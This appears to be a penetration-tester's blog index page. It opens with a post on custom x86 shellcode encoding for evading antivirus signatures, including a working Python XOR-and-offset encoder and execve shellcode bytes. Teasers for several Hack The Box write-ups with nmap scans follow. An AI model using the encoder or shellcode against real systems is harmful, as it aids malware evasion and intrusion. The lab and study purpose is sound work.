
OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

What is Encoder?

In computer systems, an encoder can serve several purposes. Base64, for example, turns arbitrary binary data into a set of ASCII characters that practically every system can handle. An attacker, on the other hand, may use an encoder to mangle their own code so that it no longer matches the signatures a security product such as an AV engine looks for, or to avoid bytes a target will not accept. Today, I will demonstrate a simple custom encoding scheme for x86 shellcode.
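To make the idea concrete, here is a small custom encoder of the kind the article introduces. This is an added example, not the author's scheme and not code from the original post: the transform (XOR each byte with a one-byte key, then add the byte's position mod 256) was chosen for this page so that repeated input bytes stop producing repeated output bytes, which is what defeats a naive byte-pattern signature. The sample input is the well-known 23-byte Linux x86 execve("/bin/sh") payload, used only as realistic test data; the function and constant names are this example's own. A matching x86 decoder stub that reverses the transform at run time must be prepended to the encoded bytes before use, and that stub is deliberately not shown here.

```python
"""
Illustrative shellcode encoder (added example, not the article's own scheme).

Transform for byte i:  enc[i] = ((raw[i] XOR key) + i) mod 256
Inverse:               raw[i] = ((enc[i] - i) mod 256) XOR key

A real deployment needs an x86 decoder stub implementing the inverse,
prepended to the encoded bytes; that stub is out of scope here.
"""
from typing import List, Optional

# Sample input: well-known 23-byte Linux x86 execve("/bin/sh") payload.
# It is test data for the encoder, nothing more.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)


def encode(payload: bytes, key: int) -> bytes:
    """XOR every byte with `key`, then add the byte's index (mod 256)."""
    if not 0 < key < 256:
        raise ValueError("key must be a non-zero byte value")
    return bytes(((b ^ key) + i) & 0xFF for i, b in enumerate(payload))


def decode(encoded: bytes, key: int) -> bytes:
    """Exact inverse of encode(): subtract the index, then XOR with `key`."""
    return bytes((((c - i) & 0xFF) ^ key) for i, c in enumerate(encoded))


def bad_char_positions(data: bytes, bad: bytes) -> List[int]:
    """Offsets in `data` holding any byte listed in `bad` (e.g. NUL)."""
    return [i for i, b in enumerate(data) if b in bad]


def find_key(payload: bytes, bad: bytes = b"\x00") -> Optional[int]:
    """First key for which neither the encoded bytes nor the key itself
    (which ends up embedded in the decoder stub) contain a bad character."""
    for key in range(1, 256):
        if key in bad:
            continue
        if not bad_char_positions(encode(payload, key), bad):
            return key
    return None


def as_c_string(data: bytes) -> str:
    """Render bytes as a "\\xNN" string literal for pasting into an exploit."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


if __name__ == "__main__":
    key = find_key(SHELLCODE)
    if key is None:
        raise SystemExit("no single-byte key avoids the bad characters")
    enc = encode(SHELLCODE, key)
    assert decode(enc, key) == SHELLCODE, "round trip failed"
    print(f"key      = 0x{key:02x}")
    print(f"encoded  = {as_c_string(enc)}")
```

The position-dependent addition is what distinguishes this from a plain XOR: four identical input bytes come out as four different values, so a scanner cannot simply XOR-brute-force a repeated pattern. The key search matters in practice because the encoded bytes, and the key byte inside the decoder stub, must still avoid whatever characters the target strips (NUL is the default here).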

Encoding Scheme


Help was an easy difficulty Linux box. Good learning path for:

  • GraphQL Query Enumeration
  • Unauthenticated PHP File Upload (HelpDeskZ)
  • Linux Kernel Exploit

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.121
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-13 00:14 EDT
Nmap scan report for 10.10.10.121
Host is up (0.081s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page…

Json was a medium difficulty Windows box. Good learning path for:

  • JSON-based deserialization (Bearer: header)
  • JuicyPotato Exploit (SeImpersonatePrivilege)

Initial Recon

Nmap

# nmap -Pn --open -sC -sV -p- -T4 10.10.10.158
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service…


Unattended was a medium difficulty Linux box. Good learning path for:

  • Nginx off-by-slash Attack
  • SQLi (boolean-based Blind)
  • SQLi → LFI (Abusing Existing <?php include(); ?>)
  • LFI → PHP Session Poisoning → RCE
  • Socket TTY Shell
  • Linux initrd Exploit

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.126
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-12 12:33 EDT
Nmap scan report for 10.10.10.126
Host is up (0.078s latency).
Not shown: 65533 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Site doesn't have a title…


Mango was a medium difficulty Linux box. Good learning path for:

  • MongoDB — NoSQL Exploit to Brute-force the passwords
  • Permissive SUID Binary Abuse (GTFobins — JJS Exploit)

Initial Recon

Nmap

# nmap -Pn --open -sC -sV -p- -T4 10.10.10.162
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN…


Zipper is a hard difficulty Linux box. Good learning path for:

  • Zabbix-cli Access
  • Zabbix RCE Exploit
  • SUID Binary Hijack

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.108
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-11 21:32 EDT
Nmap scan report for 10.10.10.108
Host is up (0.082s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 59:20:a3:a0:98:f2:a7:14:1e:08:e0:9b:81:72:99:0e (RSA)
| 256 aa:fe:25:f8:21:24:7c:fc:b5:4b:5f:05:24:69:4c:76 (ECDSA)
|_ 256 89:28:37:e2:b6:cc:d5:80:38:1f:b2:6a:3a:c3:a1:84 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 …

Falafel is a hard difficulty Linux box. Really good learning path for:

  • SQLi (Boolean-based Blind)
  • PHP Type Juggling Attack (Loose Comparison Weakness / Magic Hashes)
  • Filename Truncation Attack to Upload a PHP Script
  • Linux Framebuffer (video group privilege)
  • Linux File System Debug (disk group privilege)

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.73
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 20:40 EDT
Nmap scan report for 10.10.10.73
Host is up (0.081s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)…


Blocky is an easy difficulty Linux box. Good learning path for:

  • Java Decompiler (JD-GUI)

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 20:04 EDT
Nmap scan report for 10.10.10.37
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction! …

Celestial is a medium difficulty Linux box. Good learning path for:

  • NodeJS Deserialization Attack
  • CronJob Hijack for Privilege Escalation

Initial Recon

Nmap

# nmap -Pn --open -p- -T4 -sV -sC 10.10.10.85
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 16:26 EDT
Nmap scan report for 10.10.10.85
Host is up (0.082s latency).
Not shown: 64257 closed ports, 1277 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
  • HTTP (3000/TCP) — NodeJS web application. But it rendered “404”
